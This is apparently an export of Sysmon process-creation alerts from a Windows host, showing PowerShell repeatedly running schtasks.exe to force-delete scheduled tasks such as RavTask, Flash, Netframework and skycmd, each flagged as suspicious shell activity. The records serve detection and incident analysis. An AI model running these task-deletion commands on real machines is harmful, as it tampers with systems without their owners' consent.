+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.847387200Z"",""eventRecordID"":""3072"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.844\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a5252700}\r\nProcessId: 7588\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.844"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010a5252700}"",""processId"":""7588"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.687",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.820 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001028232700} +ProcessId: 7684 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.824295600Z"",""eventRecordID"":""3071"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.820\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001028232700}\r\nProcessId: 7684\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.820"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001028232700}"",""processId"":""7684"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.650",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.796 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001060212700} +ProcessId: 2652 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.798220800Z"",""eventRecordID"":""3070"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.796\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-001060212700}\r\nProcessId: 2652\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.796"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-001060212700}"",""processId"":""2652"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.624",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.769 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a11f2700} +ProcessId: 7484 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.772046400Z"",""eventRecordID"":""3069"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.769\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010a11f2700}\r\nProcessId: 7484\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.769"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010a11f2700}"",""processId"":""7484"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.603",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.740 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f81d2700} +ProcessId: 6864 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.743485700Z"",""eventRecordID"":""3068"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.740\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010f81d2700}\r\nProcessId: 6864\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.740"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010f81d2700}"",""processId"":""6864"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.589",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.700 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010cf1b2700} +ProcessId: 7940 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:01.702370100Z"",""eventRecordID"":""3067"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:01.700\r\nProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010cf1b2700}\r\nProcessId: 7940\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:01.700"",""processGuid"":""{df9fc3d3-b3b5-5ecf-0000-0010cf1b2700}"",""processId"":""7940"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:29.572",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:01.651 +ProcessGuid: {df9fc3d3-b3b5-5ecf-0000-0010091a2700} +ProcessId: 7780 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo 